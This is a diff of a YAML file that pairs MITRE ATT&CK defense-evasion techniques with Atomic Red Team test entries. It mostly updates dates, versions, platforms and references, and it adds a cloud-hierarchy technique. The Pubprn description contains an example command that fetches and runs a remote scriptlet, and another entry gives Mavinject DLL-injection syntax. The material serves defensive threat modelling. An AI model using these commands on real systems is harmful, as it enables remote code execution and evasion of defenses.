+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests:
     - name: Malicious PAM rule
@@ -640,7 +659,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -667,8 +686,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -710,7 +727,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -788,7 +804,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests:
     - name: chmod - Change file or folder mode (numeric mode)
@@ -1177,7 +1192,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -1196,7 +1211,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -1286,7 +1300,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -1344,12 +1357,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -1375,11 +1463,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -1424,12 +1511,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1500,11 +1586,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1572,7 +1657,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests:
     - name: Loadable Kernel Module based Rootkit
@@ -1784,7 +1868,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1821,13 +1905,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1928,7 +2010,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1959,7 +2040,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1993,8 +2074,6 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests:
     - name: Sudo usage
@@ -2112,7 +2191,7 @@ defense-evasion:
           sudo visudo -c -f /usr/local/etc/sudoers
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -2164,12 +2243,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -2249,12 +2327,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -2273,7 +2350,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -2287,7 +2363,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -2314,8 +2389,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -2346,7 +2421,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -2403,7 +2479,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -2456,7 +2531,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -2472,11 +2547,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -2522,8 +2596,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -2533,9 +2607,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests:
     - name: Execute a process from a directory masquerading as the current parent
@@ -2587,7 +2660,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -2611,8 +2684,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -2676,11 +2747,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -2701,8 +2771,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -2746,12 +2816,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -2771,9 +2840,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2793,9 +2867,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2812,6 +2885,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2845,7 +2922,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2895,7 +2971,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2923,8 +2999,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2967,7 +3041,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2991,12 +3065,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -3086,13 +3158,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (Linux)
@@ -3143,7 +3214,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -3168,8 +3239,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests:
     - name: rm -rf
@@ -3389,7 +3458,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -3415,8 +3484,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -3468,18 +3535,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
